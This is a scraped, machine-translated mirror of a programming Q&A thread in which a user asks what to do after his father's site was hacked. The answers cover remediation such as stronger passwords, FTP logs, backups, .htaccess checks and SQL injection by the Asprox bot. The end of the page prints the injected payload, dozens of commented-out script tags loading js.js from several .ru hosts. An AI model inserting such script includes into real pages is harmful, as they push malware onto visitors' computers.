Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/security/4.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Security 我的网站被黑了。。我该怎么办?_Security_Cracking - Fatal编程技术网

Security 我的网站被黑了。。我该怎么办?

Security 我的网站被黑了。。我该怎么办?,security,cracking,Security,Cracking,我爸爸今天打电话给我,说去他网站的人有168个病毒试图下载到他们的电脑上。他一点也不懂技术,用所见即所得编辑器构建了整个过程 我打开他的网站并查看了源代码,在关闭HTML标记之前的源代码底部有一行Javascript包含。其中包括该文件(以及许多其他文件): 他有一个六个字的密码,可能是被蛮力逼迫的。这比他的ftp被截获的可能性更大,但也可能是这样 从一个更强的密码开始。(8个字符仍然相当弱) 查看此internet链接是否有用。尝试收集尽可能多的信息。查看主机是否可以给您一个日志,其中显示与您

我爸爸今天打电话给我,说去他网站的人有168个病毒试图下载到他们的电脑上。他一点也不懂技术,用所见即所得编辑器构建了整个过程

我打开他的网站并查看了源代码,在关闭HTML标记之前的源代码底部有一行Javascript包含。其中包括该文件(以及许多其他文件):
他有一个六个字的密码,可能是被蛮力逼迫的。这比他的ftp被截获的可能性更大,但也可能是这样

从一个更强的密码开始。(8个字符仍然相当弱)


查看此internet链接是否有用。

尝试收集尽可能多的信息。查看主机是否可以给您一个日志,其中显示与您的帐户建立的所有FTP连接。您可以使用这些来查看它是否是用于进行更改的FTP连接,并可能获取IP地址

如果您使用的是预先打包的软件,如Wordpress、Drupal或其他未编码的软件,则上载代码中可能存在允许进行此类修改的漏洞。如果是自定义生成的,请仔细检查允许用户上载文件或修改现有文件的任何位置

第二件事是将站点按原样转储,并检查所有内容是否有其他修改。这可能只是他们所做的一次修改,但如果他们通过FTP进入,谁知道还有什么

将站点恢复到已知的良好状态,如果需要,升级到最新版本


你也必须考虑到回报水平。是否值得尝试追踪该人,或者这是你生活、学习和使用更强大密码的地方?

该网站只是简单的静态HTML吗?i、 e.他没有为自己编写一个上传页面,允许任何路过的人上传泄露的脚本/页面

为什么不问问webhost4life是否有可用的FTP日志,并向他们报告问题。你永远都不知道,他们可能非常乐于接受,并为你查明到底发生了什么


我在一家共享主机公司工作,我们总是欢迎这样的报告,通常可以根据这些报告精确定位攻击的确切载体,并建议客户哪里出了问题。

您提到您的父亲使用了一个网站发布工具

如果发布工具从他的计算机发布到服务器,可能是因为他的本地文件是干净的,他只需要重新发布到服务器


他应该看看是否有一个不同的登录方法,他的服务器比普通的FTP,虽然。。。这不是很安全,因为它在互联网上以明文形式发送他的密码。

我知道这在游戏中已经有点晚了,但是JavaScript的URL在一个已知的网站列表中被提到,这些网站是六月份启动的ASPRox机器人死灰复燃的一部分(至少那是我们被标记的时候)。下面介绍了一些细节:

关于这一点,令人讨厌的是,实际上数据库中的每一个varchar类型字段都被“感染”,从而吐出对该URL的引用,在该引用中,浏览器会得到一个很小的iframe,从而将其变成一个bot。可在以下位置找到此问题的基本SQL修复程序:

但可怕的是,病毒会在系统表中查找要感染的值,许多共享主机计划也会为其客户端共享数据库空间。所以很可能不是你爸爸的网站被感染了,而是他托管集群中的其他网站写了一些糟糕的代码,打开了SQL注入攻击的大门

如果他还没有这样做,我会给他们的主机发送一封紧急电子邮件,并给他们一个指向SQL代码的链接,以修复整个系统。您可以修复自己受影响的数据库表,但最有可能的是,正在进行感染的机器人将再次通过该漏洞,并感染整个数据库

希望这能给你提供更多的信息


编辑:再快速想一想,如果他正在使用一个主机在线设计工具来构建他的网站,那么所有这些内容可能都放在一个专栏中,并以这种方式被感染。

显然,我们是从同一个人那里被黑客攻击的!或者机器人,在我们的例子中。他们在一些旧的经典ASP站点的URL中使用SQL注入,这些站点已经没有人维护了。我们发现了正在攻击的IP,并在IIS中阻止了它们。现在我们必须重构所有旧的ASP。
因此,我的建议是首先查看IIS日志,以确定问题是否出在站点的代码或服务器配置中。

在不关闭Web服务器的情况下拔掉它,以避免关闭脚本。通过另一台计算机将硬盘作为数据驱动器进行分析,看看是否可以通过日志文件和类似性质的东西确定罪魁祸首。验证代码是否安全,然后从备份中将其还原。

这发生在我最近托管在ipower上的一个客户端上。我不确定您的托管环境是否基于Apache,但如果确实如此,请仔细检查您没有创建的.htaccess文件,特别是在webroot上方和映像目录内部,因为它们往往也会在那里注入一些污点(它们会根据用户在引用中的来源重定向用户)。还要检查您为未编写的代码创建的任何代码。

仅fwiw,webhost4life在端口2222处有sftp。
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->